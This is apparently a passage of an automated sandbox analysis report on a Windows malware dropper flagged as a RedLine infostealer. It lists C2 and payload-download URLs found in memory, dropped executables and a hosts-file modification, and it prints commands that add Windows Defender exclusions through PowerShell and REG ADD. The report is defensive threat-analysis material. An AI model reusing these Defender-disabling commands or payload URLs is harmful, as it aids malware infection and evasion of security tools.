Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1757611845.0000000000784000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2622067874.0000000009458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1872848729.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/%
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/6
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2622089224.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2688557966.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2688496198.00000000007DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/66
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1872848729.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1757611845.0000000000784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/E
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/S_1
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2622089224.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2688557966.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2688496198.00000000007DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/g
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/ity
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1757611845.0000000000784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/llowedCert_OS_1
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1757611845.0000000000784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/m
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1757611845.0000000000784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/osoft
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166/tificate
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://addons.opera.com/en/extensions/details/dify-cashback/
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f.opera.com
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://autoupdate.geo.opera.com/
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://autoupdate.geo.opera.com/geolocation/
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://autoupdate.geo.opera.com/https://autoupdate.geo.opera.com/geolocation/OperaDesktophttps://cr
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592634901.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x64
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592634901.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x64T
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://crashpad.chromium.org/
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://crashpad.chromium.org/bug/new
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://crashstats-collector.opera.com/collector/submit
Source: file.exe, 00000000.00000002.1468881299.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1473871872.0000000006270000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1574710407.0000000001209000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1577176941.0000000001203000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary;
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryB
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1574710407.0000000001209000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1577176941.0000000001203000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryQ.
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryp
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1574710407.0000000001209000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1577176941.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryv.
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryx
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.opera.com/
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592634901.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1598360457.0000000057328000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.opera.com/download/get/?id=63821&autoupdate=1&ni=1&stream=stable&utm_campaign=767&u
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://download.opera.com/download/get/?partner=www&opsys=Windows&utm_source=netinstaller
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download3.operacdn.com/
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download3.operacdn.com/B&
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download3.operacdn.com/ftp/pub/opera/desktop/105.0.4970.16/win/Opera_105.0.4970.16_Autoupdat
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1577176941.0000000001203000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://features.opera-api2.com/
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1574710407.0000000001209000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1577176941.0000000001203000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://features.opera-api2.com/?
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://features.opera-api2.com/api/v2/features?country=%s&language=%s&uuid=%s&product=%s&channel=%s
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=da7fffaf-858c-44bb-bd
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://help.instagram.com/581066165581870;
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://help.opera.com/latest/
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://legal.opera.com/eula/computers
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://legal.opera.com/privacy
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://legal.opera.com/privacy.
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://legal.opera.com/terms
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://legal.opera.com/terms.
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://opera.com/privacy
Source: file.exe, 00000000.00000002.1468709209.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://policies.google.com/terms;
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://redir.opera.com/uninstallsurvey/
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://sourcecode.opera.com
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199571056594
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199571056594torosdaghello
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1726494688.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1726494688.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1706606834.000000000077F000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/starcofeeth
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/starcofeethtorosdagMozilla/5.0
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://telegram.org/tos/
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://twitter.com/en/tos;
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1726494688.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: file.exe, 00000000.00000002.1473871872.0000000006270000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://www.opera.com
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.opera.com..
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://www.opera.com/
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://www.opera.com/download/
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://www.opera.com/privacy
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.whatsapp.com/legal;

Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: c. Facebook Messenger: A messaging service provided by Facebook, Inc., Meta Platforms Ireland Ltd. or related companies, depending on where you are accessing their services. Terms of use are available at https://www.facebook.com/legal/terms; and equals www.facebook.com (Facebook)
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: hatsapp.com/legal; and c. Facebook Messenger: A messaging service provided by Facebook, Inc., Meta Platforms Ireland Ltd. or related companies, depending on where you are accessing their services. Terms of use are available at https://www.facebook.com/l equals www.facebook.com (Facebook)

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\av4uoJUKtp0Dae50mONtR9f9.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\MCSU0hpYCBYwreTAx2gvQqTW.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\VNjvZol8PlRMOfu5WlQLfgQN.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\IgULl9WjdOj8mJztw0uHvxbW.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\V77ImAzjtVAt7W94zmw0o9VA.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\bIcj5NJCkkIc9XclTK9WXZLS.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\xaRtMl281tBvEQLxjcEm29sg.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\41rSfwrrEtzdo8l6hDX9qUIY.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\lx1ggIRPyoQP8uRSWNRnkZlF.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\XIP5yv6jsSsJrnkuXRlubTEg.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\FpP9TKUra38F8BD04FwCoPto.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\37Xh5AWBBTFPX7DCQvpQDJWI.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\ss18o36u7ZpVeBt30wfMc6QL.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\Xkv4Yy91IYUWlrxVDJ9pNrAt.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\q3wz7sJmTQgL2ejSFHqUOz9e.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\uScPA2mexaYLqHB3aMjewISk.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Local\6D0wEbfp4dy4jAN7wi8NeRqk.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\Pictures\sgT91h1OakHt6BAnyK2HYdhK.exe entropy: 7.99694759332	Jump to dropped file
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Opera_105.0.4970.16_Autoupdate_x64[1].exe entropy: 7.99999278183	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\setup294[1].exe entropy: 7.99907186504	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: C:\Users\user\Pictures\Minor Policy\TcGLfdTBaos9JgPXgH8pOdVr.exe entropy: 7.99907186504	Jump to dropped file
Source: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe	File created: C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\__data__\config.txt entropy: 7.99984399882	Jump to dropped file
Source: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe	File created: C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\Install.exe entropy: 7.99578478384	Jump to dropped file
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	File created: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\__data__\config.txt entropy: 7.99984399882	Jump to dropped file
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	File created: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe entropy: 7.99578478384	Jump to dropped file
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	File created: C:\Users\user\AppData\Local\Temp\7zS2AC3.tmp\__data__\config.txt entropy: 7.99984399882	Jump to dropped file
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	File created: C:\Users\user\AppData\Local\Temp\7zS2AC3.tmp\Install.exe entropy: 7.99578478384	Jump to dropped file

Modifies the hosts file

Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe

File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Malicious sample detected (through community Yara rule)

Source: C:\Users\user\Pictures\Minor Policy\eoK_HtB8HzOnJQBreBydnt5f.exe, type: DROPPED

Matched rule: Detects RedLine infostealer Author: ditekSHen

.NET source code contains very large array initializations

Source: file.exe, 0Tx8jvbUIwHqhYZOzFadM.cs

Large array initialization: TtxpBLPv2YZhO: array initializer size 1120256

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0296DF84	0_2_0296DF84
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_004162A6	32_2_004162A6
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_0040E5A5	32_2_0040E5A5
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_004126B0	32_2_004126B0
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_00403A01	32_2_00403A01
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_00418EF1	32_2_00418EF1
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_00418FCB	32_2_00418FCB

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: twext.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: cscui.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: policymanager.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: workfoldersshell.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: starttiledata.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: usermgrcli.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: shacct.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: idstore.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: samlib.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: wlidprov.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: provsvc.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: usermgrproxy.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: acppage.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: msi.dll
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Section loaded: aepic.dll

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Pictures\Minor Policy\eoK_HtB8HzOnJQBreBydnt5f.exe, type: DROPPED

Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe

File deleted: C:\Windows\SysWOW64\GroupPolicyESNAh

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe

File created: C:\Windows\System32\GroupPolicy\gpt.ini

Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: String function: 00413954 appears 179 times

Source: file.exe, 00000000.00000000.1459216534.0000000000752000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelab_1.exe, vs file.exe
Source: file.exe, 00000000.00000002.1468881299.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameuSoJivOOU4 vs file.exe
Source: file.exe, 00000000.00000002.1468709209.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNew.exe" vs file.exe
Source: file.exe, 00000000.00000002.1473871872.0000000006270000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameuSoJivOOU4 vs file.exe
Source: file.exe, 00000000.00000002.1467459676.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe

Source: file.exe

Static PE information: invalid certificate

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@155/317@0/40

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4aBHXrK8XjSbEjiL1WIQ7Kmf.bat" "

Source: file.exe	ReversingLabs: Detection: 40%
Source: file.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
